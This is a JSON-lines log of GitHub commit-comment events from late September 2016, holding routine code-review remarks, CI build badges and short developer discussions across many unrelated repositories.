{"id":"4633667083","type":"CommitCommentEvent","actor":{"login":"PrajaktaPurohit"},"repo":{"name":"taco911/musical-fiesta"},"payload":{"comment":{"id":19215373,"position":null,"line":null,"path":null,"commit_id":"4d3937b6430084444000626dcc78d46984f21940","created_at":"2016-09-28T21:54:31Z","updated_at":"2016-09-28T21:54:31Z","body":"Delivery Status:\n----------------\n|Verify|\n|:--|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/040cb51c-67b3-4ef8-b977-b8eb85d66bf8/status/verify', target='_blank'><img src='https://img.shields.io/badge/Unit-Skipped-lightgrey.svg', alt='Unit'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/040cb51c-67b3-4ef8-b977-b8eb85d66bf8/status/verify', target='_blank'><img src='https://img.shields.io/badge/Lint-Skipped-lightgrey.svg', alt='Lint'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/040cb51c-67b3-4ef8-b977-b8eb85d66bf8/status/verify', target='_blank'><img src='https://img.shields.io/badge/Syntax-Skipped-lightgrey.svg', alt='Syntax'></a>|\n"}},"created_at":"2016-09-28T21:54:31Z"}
{"id":"4633667713","type":"CommitCommentEvent","actor":{"login":"codesnake"},"repo":{"name":"kszaq/LibreELEC.tv"},"payload":{"comment":{"id":19215375,"position":null,"line":null,"path":null,"commit_id":"51f50059fa69b9b9b7f36113c419df973a18be55","created_at":"2016-09-28T21:54:37Z","updated_at":"2016-09-28T21:54:37Z","body":"I will check."}},"created_at":"2016-09-28T21:54:37Z"}
{"id":"4633667851","type":"CommitCommentEvent","actor":{"login":"ruimarinho"},"repo":{"name":"seegno-forks/nsq.js"},"payload":{"comment":{"id":19215376,"position":15,"line":35,"path":"test/acceptance/writer.js","commit_id":"61464f465ad7d229e33153d2b49eed59b0290253","created_at":"2016-09-28T21:54:39Z","updated_at":"2016-09-28T21:54:39Z","body":"Why was this removed @promag?"}},"created_at":"2016-09-28T21:54:39Z"}
{"id":"4633670495","type":"CommitCommentEvent","actor":{"login":"deltakosh"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215381,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:55:10Z","updated_at":"2016-09-28T21:55:10Z","body":"that is true..my bad here..I'll take care of not forgetting it"}},"created_at":"2016-09-28T21:55:10Z"}
{"id":"4633670990","type":"CommitCommentEvent","actor":{"login":"Odonno"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215382,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:55:15Z","updated_at":"2016-09-28T21:55:15Z","body":"It seems to be on the wrong PR, yes."}},"created_at":"2016-09-28T21:55:15Z"}
{"id":"4633673523","type":"CommitCommentEvent","actor":{"login":"ScottIsAFool"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215385,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:55:44Z","updated_at":"2016-09-28T21:55:44Z","body":"Also, we should have this fix in 1.1, but if this PR gets pushed to 1.2, then the fix has to wait for 1.2 as well (and it really should be in 1.1)"}},"created_at":"2016-09-28T21:55:44Z"}
{"id":"4633674088","type":"CommitCommentEvent","actor":{"login":"rezso"},"repo":{"name":"uhulinux/cdgen-ubk"},"payload":{"comment":{"id":19215387,"position":null,"line":null,"path":null,"commit_id":"eb1db1976d3e8777ee7390fd957f2f36302e98b8","created_at":"2016-09-28T21:55:51Z","updated_at":"2016-09-28T21:55:51Z","body":"Kösz, viszont más hiba is volt a cdgen-ben."}},"created_at":"2016-09-28T21:55:51Z"}
{"id":"4633674445","type":"CommitCommentEvent","actor":{"login":"jamrizzi"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19215388,"position":null,"line":null,"path":null,"commit_id":"d5ba8e848d090ccbd93cd69a3c2b52496e0ff1fb","created_at":"2016-09-28T21:55:54Z","updated_at":"2016-09-28T21:55:54Z","body":"This is like super exciting. Are you planning any form of celebration when you do officially release SailsJS 1. I'm the lead developer at a rapidly expanding company in Austin that is heavily invested in your platform."}},"created_at":"2016-09-28T21:55:54Z"}
{"id":"4633676630","type":"CommitCommentEvent","actor":{"login":"xthian82"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":19215392,"position":null,"line":null,"path":null,"commit_id":"8fae046f71ed6be3756f2abb1b5452fbeb5a5618","created_at":"2016-09-28T21:56:18Z","updated_at":"2016-09-28T21:56:18Z","body":"I've used a helper method for starting activities, \r\n\r\n`\r\n\t\r\n\t\t@Override\r\n\t\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\t\t// ...\r\n\t\t\t// ...\r\n\t\t\t\r\n\t\t\tTextview mColorsText = (TextView) findViewById(R.id.colors);\r\n\t\t\tmColorsText.setOnClickListener(new View.OnClickListener() {\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\tstartActive(ColorsActivity.class);\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\t//...\r\n\t\t}\r\n\t\t\r\n\t\tpublic void startActive(Class<?> activity) {\r\n\t\t\tIntent intent = new Intent(this, activity);\r\n\t\t\tstartActivity(intent);\r\n\t\t}\r\n\t\r\n`"}},"created_at":"2016-09-28T21:56:18Z"}
{"id":"4633677779","type":"CommitCommentEvent","actor":{"login":"fg2it"},"repo":{"name":"ThomDietrich/openhabian"},"payload":{"comment":{"id":19215395,"position":89,"line":523,"path":"openhabian-setup.sh","commit_id":"497f6bd14ecc961983a2c4fea05e1d22dd50ffd7","created_at":"2016-09-28T21:56:32Z","updated_at":"2016-09-28T21:56:32Z","body":"I am missing something. The .deb is not small but it should be there only temporarily. After the `dpkg -i`, the binary should be in `/usr/local/bin`. So, for this install, any folder should do the job."}},"created_at":"2016-09-28T21:56:32Z"}
{"id":"4633678990","type":"CommitCommentEvent","actor":{"login":"cpandhi"},"repo":{"name":"WilcoFiers/auto-wcag"},"payload":{"comment":{"id":19215400,"position":null,"line":null,"path":null,"commit_id":"934edd172b416367584008ff4ee5af09d058bed1","created_at":"2016-09-28T21:56:46Z","updated_at":"2016-09-28T21:56:46Z","body":"My suggested format:\r\nName: rule id\r\nRequired vs recommended\r\nTest mode: automatic / semi-automatic / manual\r\nDescription: What the rule tests\r\nTarget element or rule context\r\nPrimary SC: \r\nRelated SC:\r\nTechniques:\r\nTest procedure:\r\nTest results: Pass, Violation, Possible Violation, Manual check, Warning.\r\n\r\nStill trying to understand if we need,\r\nAssumptions:\r\nEnvironment: will this ever run against anything but the rendered content in the browser?\r\nTest properties section i feel is repeating info from above.\r\n\r\n"}},"created_at":"2016-09-28T21:56:46Z"}
{"id":"4633679922","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215406,"position":null,"line":null,"path":null,"commit_id":"58bf818f46873a4dbc95725732abac6276133ff4","created_at":"2016-09-28T21:56:57Z","updated_at":"2016-09-28T21:56:57Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-58bf818f46873a4dbc95725732abac6276133ff4-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-58bf818f46873a4dbc95725732abac6276133ff4-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T21:56:57Z"}
{"id":"4633691133","type":"CommitCommentEvent","actor":{"login":"deltakosh"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215434,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T21:59:06Z","updated_at":"2016-09-28T21:59:06Z","body":"On it!"}},"created_at":"2016-09-28T21:59:06Z"}
{"id":"4633693963","type":"CommitCommentEvent","actor":{"login":"tingletech"},"repo":{"name":"tingletech/public_interface"},"payload":{"comment":{"id":19215440,"position":null,"line":null,"path":null,"commit_id":"1d95ce7cad6ddc1ff30513f7cc8ba34d9f3c8f9b","created_at":"2016-09-28T21:59:37Z","updated_at":"2016-09-28T21:59:37Z","body":"big CPU spike on left is w/o this -- takes down solr\r\n\r\n<img width=\"985\" alt=\"screen shot 2016-09-28 at 2 50 12 pm\" src=\"https://cloud.githubusercontent.com/assets/227374/18933838/78738d42-858b-11e6-8e58-b82f337eea03.png\">\r\n\r\nnote second spike -- no corresponding CPU spike on the graph\r\n\r\n<img width=\"993\" alt=\"screen shot 2016-09-28 at 2 50 24 pm\" src=\"https://cloud.githubusercontent.com/assets/227374/18933837/78712e26-858b-11e6-9591-8f2e3a71f6b0.png\">\r\n\r\nbut \r\n\r\n2016-09-28 14:52:47 UTC-0700\tINFO\tEnvironment health has transitioned from Ok to Info. Command is executing on 1 out of 2 instances.\r\n\r\nto the left 2016-09-28 12:49:52 UTC-0700\tWARN\tEnvironment health has transitioned from Ok to Severe. 100.0 % of the requests to the ELB are failing with HTTP 5xx (3 minutes ago).\r\n\r\n<img width=\"967\" alt=\"screen shot 2016-09-28 at 2 56 33 pm\" src=\"https://cloud.githubusercontent.com/assets/227374/18933949/0d1d3c86-858c-11e6-899f-6580a8ebefdf.png\">"}},"created_at":"2016-09-28T21:59:37Z"}
{"id":"4633694671","type":"CommitCommentEvent","actor":{"login":"sdogruyol"},"repo":{"name":"sdogruyol/kemal-mysql"},"payload":{"comment":{"id":19215444,"position":null,"line":null,"path":null,"commit_id":"6334104f5dc18ad0e67cd6e7e9a8a6b8099bdcdd","created_at":"2016-09-28T21:59:45Z","updated_at":"2016-09-28T21:59:45Z","body":"Well, it's just you implement it on your own way."}},"created_at":"2016-09-28T21:59:45Z"}
{"id":"4633696634","type":"CommitCommentEvent","actor":{"login":"JoshSmith"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19215447,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-28T22:00:07Z","updated_at":"2016-09-28T22:00:07Z","body":"Right, I mean that I'd prefer not to initiate reporting on all those branches that are around only for the sake of a pull request. It's an extra request that doesn't need to made, extra CPU time that doesn't need spent, etc. I'm only interested in the default branch getting reported, and would _love_ a setting that supports this."}},"created_at":"2016-09-28T22:00:07Z"}
{"id":"4633697588","type":"CommitCommentEvent","actor":{"login":"promag"},"repo":{"name":"seegno-forks/nsq.js"},"payload":{"comment":{"id":19215450,"position":15,"line":35,"path":"test/acceptance/writer.js","commit_id":"61464f465ad7d229e33153d2b49eed59b0290253","created_at":"2016-09-28T22:00:16Z","updated_at":"2016-09-28T22:00:16Z","body":"It won't happen cause it always wait for a connection."}},"created_at":"2016-09-28T22:00:16Z"}
{"id":"4633707120","type":"CommitCommentEvent","actor":{"login":"gregw"},"repo":{"name":"GoogleCloudPlatform/jetty-runtime"},"payload":{"comment":{"id":19215472,"position":6,"line":35,"path":"pom.xml","commit_id":"746eb6a590456b98accf451596cf0627462db6cb","created_at":"2016-09-28T22:01:59Z","updated_at":"2016-09-28T22:01:59Z","body":"Ah, I guess the issue here is that the maven.build.timestamp formats the timestamp for all the snapshots etc.\r\nSo we can either just use the default maven timestamp for our labels, or we need to format just the label timestamp and not the maven one?"}},"created_at":"2016-09-28T22:01:59Z"}
{"id":"4633709469","type":"CommitCommentEvent","actor":{"login":"deltakosh"},"repo":{"name":"Microsoft/UWPCommunityToolkit"},"payload":{"comment":{"id":19215474,"position":null,"line":null,"path":null,"commit_id":"73058a366e5c75809972010c999977368aedd311","created_at":"2016-09-28T22:02:26Z","updated_at":"2016-09-28T22:02:26Z","body":"Done..reverted and new PR submitted!"}},"created_at":"2016-09-28T22:02:26Z"}
{"id":"4633716100","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19215485,"position":30,"line":66,"path":"app/siteHacks.js","commit_id":"74790fc129daceac20076203a487ef186a4ff569","created_at":"2016-09-28T22:03:31Z","updated_at":"2016-09-28T22:03:31Z","body":"URL.parse should not have been called here, since Filtering.isResourceEnabled expects a URL string"}},"created_at":"2016-09-28T22:03:31Z"}
{"id":"4633716613","type":"CommitCommentEvent","actor":{"login":"b1conrad"},"repo":{"name":"Picolab/node-pico-engine"},"payload":{"comment":{"id":19215487,"position":null,"line":null,"path":null,"commit_id":"7de1bfbafc5619bdfd351d2e955245aec20f6ae8","created_at":"2016-09-28T22:03:38Z","updated_at":"2016-09-28T22:03:38Z","body":"so that this ruleset (and those two functions) can be used as a module"}},"created_at":"2016-09-28T22:03:38Z"}
{"id":"4633722221","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215493,"position":17,"line":17,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-28T22:04:45Z","updated_at":"2016-09-28T22:04:45Z","body":"This is not a Feature. The feature manager only knows about features (i.e. those defined in main.js)"}},"created_at":"2016-09-28T22:04:45Z"}
{"id":"4633722577","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215494,"position":18,"line":18,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-28T22:04:49Z","updated_at":"2016-09-28T22:04:49Z","body":"same"}},"created_at":"2016-09-28T22:04:49Z"}
{"id":"4633726098","type":"CommitCommentEvent","actor":{"login":"PrajaktaPurohit"},"repo":{"name":"taco911/musical-fiesta"},"payload":{"comment":{"id":19215501,"position":null,"line":null,"path":null,"commit_id":"90afdef63b49b4e4cc81642351df9128207a9bc7","created_at":"2016-09-28T22:05:29Z","updated_at":"2016-09-28T22:05:29Z","body":"Delivery Status:\n----------------\n|Verify|\n|:--|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/f600db42-dd09-47e9-b27e-199d90430181/status/verify', target='_blank'><img src='https://img.shields.io/badge/Unit-Skipped-lightgrey.svg', alt='Unit'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/f600db42-dd09-47e9-b27e-199d90430181/status/verify', target='_blank'><img src='https://img.shields.io/badge/Lint-Skipped-lightgrey.svg', alt='Lint'></a>|\n|<a href='http://192.168.33.66/e/cd/#/organizations/taco911/projects/musical-fiesta/changes/f600db42-dd09-47e9-b27e-199d90430181/status/verify', target='_blank'><img src='https://img.shields.io/badge/Syntax-Skipped-lightgrey.svg', alt='Syntax'></a>|\n"}},"created_at":"2016-09-28T22:05:29Z"}
{"id":"4633729372","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"vlouzada/EDL"},"payload":{"comment":{"id":19215511,"position":null,"line":null,"path":null,"commit_id":"2638c43e3766a8172fb036de7256e9400360b5c3","created_at":"2016-09-28T22:06:06Z","updated_at":"2016-09-28T22:06:06Z","body":"Tente descobrir pela discussão da última aula. Qualquer dúvida pergunte\ndepois...\n\nOn Wed, Sep 28, 2016 at 6:52 PM, Vinicius Souza <notifications@github.com>\nwrote:\n\n> Quais seriam, professor?\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vlouzada/EDL/commit/2638c43e3766a8172fb036de7256e9400360b5c3#commitcomment-19215344>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AADceyFMpj3XcM2NqtuxIiQfRiqu7L71ks5quuGqgaJpZM4KI_F1>\n> .\n>\n"}},"created_at":"2016-09-28T22:06:06Z"}
{"id":"4633734455","type":"CommitCommentEvent","actor":{"login":"tobymurray-nanometrics"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19215517,"position":null,"line":null,"path":null,"commit_id":"49c4af43ec5819d8f5c1a91f9b84296c927ce6e7","created_at":"2016-09-28T22:07:05Z","updated_at":"2016-09-28T22:07:05Z","body":"I know this thread is long dead, but I feel like I've been reading all the same things and finding none of the answers a year later. I've asked a question on StackOverflow [here](http://stackoverflow.com/questions/39756206/remove-development-gems-from-production-with-bundler-and-rails-4) - is the \"Rails way\" as it stands right now to load all development dependencies in production even though everything has been precompiled?\r\n\r\nDid anything ever come of this discussion? Any resources anyone can point me to to address this?"}},"created_at":"2016-09-28T22:07:05Z"}
{"id":"4633735979","type":"CommitCommentEvent","actor":{"login":"kolyasha"},"repo":{"name":"ProNWE/service"},"payload":{"comment":{"id":19215524,"position":68,"line":226,"path":"application/views/organizations/blocks/jumbotron.php","commit_id":"171c7fd249dbaf955c29aa38bbe32ea89ac74ea8","created_at":"2016-09-28T22:07:29Z","updated_at":"2016-09-28T22:07:29Z","body":"Два одинаковых id, забыл в класс вынести их"}},"created_at":"2016-09-28T22:07:29Z"}
{"id":"4633737898","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215529,"position":11,"line":11,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-28T22:07:50Z","updated_at":"2016-09-28T22:07:50Z","body":"unused?"}},"created_at":"2016-09-28T22:07:50Z"}
{"id":"4633742188","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215542,"position":36,"line":36,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-28T22:08:38Z","updated_at":"2016-09-28T22:08:38Z","body":"Why is it significant to have two `await`s? Could we instead call `russell.die(gunther)` immediately, and then just wait for a minute?"}},"created_at":"2016-09-28T22:08:38Z"}
{"id":"4633746489","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215553,"position":43,"line":43,"path":"javascript/features/killtime/killtime.test.js","commit_id":"238db8d883503c46b73c7788fb86296a58eda02f","created_at":"2016-09-28T22:09:29Z","updated_at":"2016-09-28T22:09:29Z","body":"nit: formatting. Arguments should be aligned. In this case you don't have to wrap at all, since the line ends up being 98 characters.\r\n\r\nIn general, please adhere to a line length limit of ~100 characters."}},"created_at":"2016-09-28T22:09:29Z"}
{"id":"4633747156","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19215554,"position":null,"line":null,"path":null,"commit_id":"3ffd6468201873b5ad669f2e89413f7f6086515c","created_at":"2016-09-28T22:09:37Z","updated_at":"2016-09-28T22:09:37Z","body":"Just got another idea:\r\n\"Armageddon\"."}},"created_at":"2016-09-28T22:09:37Z"}
{"id":"4633748077","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19215556,"position":131,"line":131,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T22:09:47Z","updated_at":"2016-09-28T22:09:47Z","body":"Space = 32\r\nEnter = 13\r\n\r\nTo save you a half second of Googleing"}},"created_at":"2016-09-28T22:09:47Z"}
{"id":"4633753308","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215562,"position":7,"line":136,"path":"javascript/features/economy/economy_calculator.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:10:48Z","updated_at":"2016-09-28T22:10:48Z","body":"Tests? (See `economy_calculator.test.js`)"}},"created_at":"2016-09-28T22:10:48Z"}
{"id":"4633754902","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215565,"position":8,"line":137,"path":"javascript/features/economy/economy_calculator.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:11:08Z","updated_at":"2016-09-28T22:11:08Z","body":"nit: this should be `const`."}},"created_at":"2016-09-28T22:11:08Z"}
{"id":"4633756963","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19215569,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-28T22:11:30Z","updated_at":"2016-09-28T22:11:30Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2357 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.28%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T22:11:30Z"}
{"id":"4633759751","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19215572,"position":null,"line":null,"path":null,"commit_id":"01f6d985f7926c6e0c8941f59e960a7ed8d9ed2e","created_at":"2016-09-28T22:12:04Z","updated_at":"2016-09-28T22:12:04Z","body":"@nadako this lets you do things like:\r\n\r\n```haxe\r\n@:luaRequire(\"some_extern\")\r\nextern class SomeExtern {\r\n  @:native(\"some_static_method\") public function new : Void;\r\n}\r\n[...]\r\n\r\nvar k = new SomeExtern();\r\n\r\n```\r\n\r\n```lua\r\nlocal SomeExtern = require(\"some_extern\")\r\n[...]\r\nlocal k = SomeExtern.some_static_method();\r\n```\r\n\r\nIs there something else I'm missing?  This looks fine for Lua.  I'm not sure why it wouldn't work for JS over in this other thread:\r\nhttps://github.com/HaxeFoundation/haxe/issues/3441\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-28T22:12:04Z"}
{"id":"4633761009","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19215574,"position":36,"line":64,"path":"insert_resi.sql","commit_id":"48a30355c23cd1506d60eed011f1057108af8b92","created_at":"2016-09-28T22:12:20Z","updated_at":"2016-09-28T22:12:20Z","body":"Added Term here"}},"created_at":"2016-09-28T22:12:20Z"}
{"id":"4633761130","type":"CommitCommentEvent","actor":{"login":"kitsunenosaraT"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19215575,"position":135,"line":135,"path":"it/mozorg/newsletters.lang","commit_id":"3a302258f6dd8bfe17692d3a02d30f6c0369b506","created_at":"2016-09-28T22:12:21Z","updated_at":"2016-09-28T22:12:21Z","body":"Riguardo alle newsletter, i miei 0,02€: secondo me è meglio lasciarle tutte in inglese proprio perché la newsletter è uguale per tutti i paesi e non ha contenuti localizzati. Inutile confondere chi si iscrive dandogli un titolo in italiano. Anzi, potrebbe addirittura generare confusione (es. uno si iscrive alla newsletter co titolo italiano, poi vede arrivare la newsletter con il titolo in inglese, di ce \"E che è sta roba?\" e la cestina).\r\nNon è questo il caso, ma, dove possibile farlo senza spezzare la frase, io accanto al nome invariato inserirei una specie di \"spiegazione\". Es. \"Iscriviti a Firefox for Desktop, la newsletter dedicata alla versione Pc di Firefox\", o \"Tips for Firefox Accounts, la newsletter che raccoglie dritte e consigli per trarre il massimo dal tuo account Firefox\""}},"created_at":"2016-09-28T22:12:21Z"}
{"id":"4633763952","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19215581,"position":49,"line":77,"path":"insert_resi.sql","commit_id":"48a30355c23cd1506d60eed011f1057108af8b92","created_at":"2016-09-28T22:12:58Z","updated_at":"2016-09-28T22:12:58Z","body":"load_zone NOT  load_zon"}},"created_at":"2016-09-28T22:12:58Z"}
{"id":"4633765964","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19215587,"position":61,"line":93,"path":"insert_resi.sql","commit_id":"48a30355c23cd1506d60eed011f1057108af8b92","created_at":"2016-09-28T22:13:24Z","updated_at":"2016-09-28T22:13:24Z","body":"Added HRR.ID"}},"created_at":"2016-09-28T22:13:24Z"}
{"id":"4633772168","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215611,"position":19,"line":148,"path":"javascript/features/economy/economy_calculator.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:14:46Z","updated_at":"2016-09-28T22:14:46Z","body":"I think you can rewrite this entire method as follows, without losing clarity:\r\n\r\n```javascript\r\n  // Money rewarded after a period of killtime. Participants receive a thousand dollars for each\r\n  // kill, multiplied by the total number of participants, with a minimum of $25,000.\r\n  calculateKilltimeAwardPrize(participants, kills) {\r\n    return Math.max(25000, 1000 * participants * kills);\r\n  }\r\n```"}},"created_at":"2016-09-28T22:14:46Z"}
{"id":"4633772331","type":"CommitCommentEvent","actor":{"login":"manubellido"},"repo":{"name":"manolo-rocks/django-manolo"},"payload":{"comment":{"id":19215612,"position":10,"line":120,"path":"manolo/templates/base.html","commit_id":"44a38fbfd455ce6790a102b7971bb4f8e21eaf46","created_at":"2016-09-28T22:14:48Z","updated_at":"2016-09-28T22:14:48Z","body":"creo que podrías poner esto en tu archivo de configuración."}},"created_at":"2016-09-28T22:14:48Z"}
{"id":"4633773705","type":"CommitCommentEvent","actor":{"login":"Jacques00"},"repo":{"name":"OXOIndustries/Trials-in-Tainted-Space"},"payload":{"comment":{"id":19215616,"position":null,"line":null,"path":null,"commit_id":"6626d0de02ead70ae8b72f1fa32391a1eee4ca56","created_at":"2016-09-28T22:15:06Z","updated_at":"2016-09-28T22:15:06Z","body":"If this is also intended for the player character, the lines may need to be copy-pasted in the PlayerCharacter's override function for milkInMouth()."}},"created_at":"2016-09-28T22:15:06Z"}
{"id":"4633774880","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215618,"position":30,"line":39,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:15:21Z","updated_at":"2016-09-28T22:15:21Z","body":"What does this mean?"}},"created_at":"2016-09-28T22:15:21Z"}
{"id":"4633778494","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215625,"position":75,"line":60,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:15:59Z","updated_at":"2016-09-28T22:15:59Z","body":"nit: alignment. elsewhere too"}},"created_at":"2016-09-28T22:15:59Z"}
{"id":"4633779467","type":"CommitCommentEvent","actor":{"login":"wyseguyonline"},"repo":{"name":"Pearson-Higher-Ed/modal-image-editor"},"payload":{"comment":{"id":19215627,"position":150,"line":150,"path":"src/js/component-owner.js","commit_id":"9500472f20894029de30793141c574359c6a12aa","created_at":"2016-09-28T22:16:11Z","updated_at":"2016-09-28T22:16:11Z","body":"If we need to have a click event, it should do more than just console.log.  We should either allow the app to pass in a callback or it should fire off an event that the app can listen for."}},"created_at":"2016-09-28T22:16:11Z"}
{"id":"4633779527","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19215628,"position":135,"line":135,"path":"it/mozorg/newsletters.lang","commit_id":"3a302258f6dd8bfe17692d3a02d30f6c0369b506","created_at":"2016-09-28T22:16:12Z","updated_at":"2016-09-28T22:16:12Z","body":"OK, grazie per i tuoi 0,02 €, li lascio in inglese allora.\n\n\n"}},"created_at":"2016-09-28T22:16:12Z"}
{"id":"4633779884","type":"CommitCommentEvent","actor":{"login":"RussellLVP"},"repo":{"name":"LVPlayground/playground"},"payload":{"comment":{"id":19215629,"position":129,"line":90,"path":"javascript/features/killtime/killtime.test.js","commit_id":"6a140362473f6ef272fdac3a25d3f0e16379eb7d","created_at":"2016-09-28T22:16:15Z","updated_at":"2016-09-28T22:16:15Z","body":"no-one -> noone"}},"created_at":"2016-09-28T22:16:15Z"}
{"id":"4633781320","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"Nougat-Surnia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":19215637,"position":null,"line":null,"path":null,"commit_id":"f08573075c774457e11bc484df62cd7016eea5de","created_at":"2016-09-28T22:16:34Z","updated_at":"2016-09-28T22:16:34Z","body":"http://review.cyanogenmod.org/#/c/161899"}},"created_at":"2016-09-28T22:16:34Z"}
